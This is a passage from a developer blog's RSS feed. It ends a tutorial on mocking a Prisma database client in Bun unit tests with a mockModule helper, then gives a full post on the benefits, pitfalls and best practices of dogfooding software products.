<p>If we try to test this directly, it will attempt to call the actual database. That’s undesirable for a unit test, so we need a way to <strong>mock the Prisma client</strong>.</p>
<h3 id="heading-the-solution-mockmodule">The Solution: <code>mockModule</code></h3>
<p>We can accomplish this using Bun’s <code>mock.module()</code> method. Here’s how:</p>
<h4 id="heading-creating-a-mock-user">Creating a Mock User</h4>
<p>First, we create a helper method:</p>
<pre><code class="lang-typescript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">createMockUser</span>(<span class="hljs-params">overrides: Partial&lt;UserEntity&gt; = {}</span>): <span class="hljs-title">UserEntity</span> </span>{
  <span class="hljs-keyword">const</span> defaultUser = {
    email: <span class="hljs-string">'john@example.com'</span>,
    created_at: <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span>(),
    updated_at: <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span>(),
    is_active: <span class="hljs-number">1</span>,
    firstname: <span class="hljs-string">'John'</span>,
    lastname: <span class="hljs-string">'Doe'</span>,
    dob: <span class="hljs-literal">null</span>,
    gender: <span class="hljs-literal">null</span>,
    password_hash: <span class="hljs-literal">null</span>,
  };

  <span class="hljs-keyword">return</span> {
    ...defaultUser,
    ...overrides,
  };
}
</code></pre>
<h4 id="heading-writing-the-spec">Writing the Spec</h4>
<p>Then, we use <code>mockModule()</code> in our test:</p>
<p>Then we will write the spec for the function by mocking the dbClient like below</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { afterEach, beforeEach, describe, expect, it, mock } <span class="hljs-keyword">from</span> <span class="hljs-string">'bun:test'</span>;
<span class="hljs-keyword">import</span> { mockModule } <span class="hljs-keyword">from</span> <span class="hljs-string">'~/lib/mockModule'</span>;

describe(<span class="hljs-string">'findUser'</span>, <span class="hljs-function">() =&gt;</span> {
  beforeEach(<span class="hljs-function">() =&gt;</span> {
    mock.module(<span class="hljs-string">'~/lib/getDbClient'</span>, <span class="hljs-function">() =&gt;</span> ({}));
  });

  afterEach(<span class="hljs-function">() =&gt;</span> {
    mock.restore();
  });

  it(<span class="hljs-string">'should redirect if user not found'</span>, <span class="hljs-keyword">async</span> () =&gt; {
    using mocked = <span class="hljs-keyword">await</span> mockModule(<span class="hljs-string">'~/lib/getDbClient'</span>, <span class="hljs-function">() =&gt;</span> ({
      getDbClient: <span class="hljs-function">() =&gt;</span> ({
        user_entity: {
          findUnique: <span class="hljs-function">() =&gt;</span> <span class="hljs-literal">null</span>,
        },
      }),
    }));

    <span class="hljs-keyword">const</span> result = <span class="hljs-keyword">await</span> findUser(<span class="hljs-number">1</span>);
    assertRedirect(result, <span class="hljs-string">'/login?msg=link_expired&amp;link_error=2'</span>);
  });

  it(<span class="hljs-string">'should return valid user'</span>, <span class="hljs-keyword">async</span> () =&gt; {
    <span class="hljs-keyword">const</span> mockUser = createMockUser();

    using mocked = <span class="hljs-keyword">await</span> mockModule(<span class="hljs-string">'~/lib/getDbClient'</span>, <span class="hljs-function">() =&gt;</span> ({
      getDbClient: <span class="hljs-function">() =&gt;</span> ({
        user_entity: {
          findUnique: <span class="hljs-function">() =&gt;</span> mockUser,
        },
      }),
    }));

    <span class="hljs-keyword">const</span> result = <span class="hljs-keyword">await</span> findUser(<span class="hljs-number">1</span>);
    expect(result.status).toBe(<span class="hljs-string">'valid'</span>);
    <span class="hljs-keyword">if</span> (result.status === <span class="hljs-string">'valid'</span>) {
      expect(result.user).toEqual(mockUser);
    }
  });
});
</code></pre>
<h3 id="heading-the-mockmodule-utility">The <code>mockModule</code> Utility</h3>
<p>Here’s the helper used to swap in and restore mock implementations:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { mock } <span class="hljs-keyword">from</span> <span class="hljs-string">'bun:test'</span>;

<span class="hljs-comment">/**
 * Mocks a module by merging its actual exports with custom implementations.
 */</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> mockModule = <span class="hljs-keyword">async</span> (
  modulePath: <span class="hljs-built_in">string</span>,
  renderMocks: <span class="hljs-function">() =&gt;</span> Record&lt;<span class="hljs-built_in">string</span>, <span class="hljs-built_in">any</span>&gt;
) =&gt; {
  <span class="hljs-keyword">const</span> original = { ...(<span class="hljs-keyword">await</span> <span class="hljs-keyword">import</span>(modulePath)) };
  <span class="hljs-keyword">const</span> mocks = renderMocks();
  <span class="hljs-keyword">const</span> result = {
    ...original,
    ...mocks,
  };
  mock.module(modulePath, <span class="hljs-function">() =&gt;</span> result);
  <span class="hljs-keyword">return</span> {
    [<span class="hljs-built_in">Symbol</span>.dispose]: <span class="hljs-function">() =&gt;</span> {
      mock.module(modulePath, <span class="hljs-function">() =&gt;</span> original);
    },
  };
};
</code></pre>
<p>With this approach, you can effectively <strong>mock Prisma instances</strong> in Bun, making your specs focused and independent of actual database connections — all without relying on Jest or Vitest.</p>
<p>If you’re migrating to Bun or starting fresh, this method gives you a clean, reliable way to test database-related logic in isolation.</p>
]]></content:encoded></item><item><title><![CDATA[Eat your dogfood - Why DogFooding Your Product is a Game-Changer]]></title><description><![CDATA[“Eat your own dog food” — it’s a phrase you have probably heard in tech circles.But behind the quirky metaphor lies a powerful practice: dogfooding.
In software development, dogfooding means using your own product in real-world scenarios before or wh...]]></description><link>https://blog.nidhin.dev/eat-your-dogfood-why-dogfooding-your-product-is-a-game-changer</link><guid isPermaLink="true">https://blog.nidhin.dev/eat-your-dogfood-why-dogfooding-your-product-is-a-game-changer</guid><category><![CDATA[dogfooding]]></category><category><![CDATA[ProductDogfooding]]></category><category><![CDATA[software development]]></category><category><![CDATA[product development]]></category><category><![CDATA[developer experience]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 01 Jun 2025 15:20:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1748791096407/b05647a3-4d89-4a11-a10f-c3318ec5ddc2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>“Eat your own dog food” — it’s a phrase you have probably heard in tech circles.But behind the quirky metaphor lies a powerful practice: <strong>dogfooding</strong>.</p>
<p>In software development, dogfooding means using your own product in real-world scenarios before or while you ship it to customers. It’s about living the user experience, warts and all.</p>
<p>So why do companies like Microsoft, Google, and Facebook dogfood their products? And should your team do it too?</p>
<h1 id="heading-what-is-dogfooding">What is Dogfooding?</h1>
<p>Dogfooding is the practice of a company using its own software internally to test features, uncover issues, and improve usability before public release. For example:</p>
<ul>
<li><p>Microsoft employees use early versions of Windows and Office internally.</p>
</li>
<li><p>Twitter staff tested their algorithm changes on internal accounts before rolling them out.</p>
</li>
</ul>
<p>It’s one of the most immediate and honest feedback loops you can create.</p>
<h1 id="heading-why-dogfooding-works">Why Dogfooding Works</h1>
<h4 id="heading-1-faster-feedback-loops">1. <strong>Faster Feedback Loops</strong></h4>
<p>Instead of waiting for external beta testers to report bugs, your internal team finds them during daily use. This makes it easier to catch edge cases and usability quirks before your users do.</p>
<h4 id="heading-2-builds-empathy-for-users">2. <strong>Builds Empathy for Users</strong></h4>
<p>Dogfooding forces the product and engineering teams to experience the friction that real users face. It builds empathy — and urgency — to fix things that slow people down.</p>
<h4 id="heading-3-encourages-quality-and-accountability">3. <strong>Encourages Quality and Accountability</strong></h4>
<p>It’s harder to let subpar features slide when your own team depends on them. There’s a natural incentive to deliver well-tested, user-friendly software.</p>
<h4 id="heading-4-improves-cross-functional-alignment">4. <strong>Improves Cross-Functional Alignment</strong></h4>
<p>Sales, marketing, and support teams get to understand the product deeply, helping them communicate value more effectively and identify gaps.</p>
<h1 id="heading-when-dogfooding-goes-wrong">When Dogfooding Goes Wrong</h1>
<p>Dogfooding isn't a silver bullet. Sometimes it gives you <strong>false confidence</strong>.</p>
<ul>
<li><p><strong>You're not your user</strong>: Your team likely has more technical skill or context than your actual audience. What’s intuitive to you may be baffling to them.</p>
</li>
<li><p><strong>Internal bias</strong>: Team members might overlook bugs or quirks because they’re “used to it.”</p>
</li>
<li><p><strong>Overfitting to internal use cases</strong>: You might optimize features for internal workflows that don’t reflect broader customer needs.</p>
</li>
</ul>
<p>Dogfooding is useful, but it must be balanced with external feedback.</p>
<h1 id="heading-best-practices-for-dogfooding">Best Practices for Dogfooding</h1>
<p>Here’s how to get the most out of dogfooding</p>
<ol>
<li><p><strong>Define Clear Use Cases</strong><br /> Don’t just use it and move on. Set goals. Which workflows should teams test? What metrics or behaviours do you want to observe?</p>
</li>
<li><p><strong>Make It Easy to Report Feedback</strong><br /> Streamline the path from observation to action. Use Slack bots, feedback forms, or tools like Productboard or Linear to gather internal insights.</p>
</li>
<li><p><strong>Rotate Fresh Eyes In</strong><br /> New hires and non-technical staff often catch usability issues that engineers overlook. Rotate testers to get fresh perspectives.</p>
</li>
<li><p><strong>Don’t Rely on Dogfooding Alone</strong><br /> Combine it with external beta testing, UX research, and A/B testing. Dogfooding complements — but doesn’t replace — real-world validation.</p>
</li>
<li><p><strong>Celebrate and Act on Discoveries</strong><br /> Highlight issues found through dogfooding, and close the loop when they’re fixed. This keeps morale high and shows that internal feedback matters.</p>
</li>
</ol>
<p>Dogfooding is one of the most powerful, practical ways to build better software — fast. It creates a culture of ownership, pride, and user-centric thinking. But like any tool, it works best when paired with the humility to recognise that internal users aren’t the final word.</p>
<p>If you build it, use it. Then make it better for everyone else.</p>
]]></content:encoded></item></channel></rss>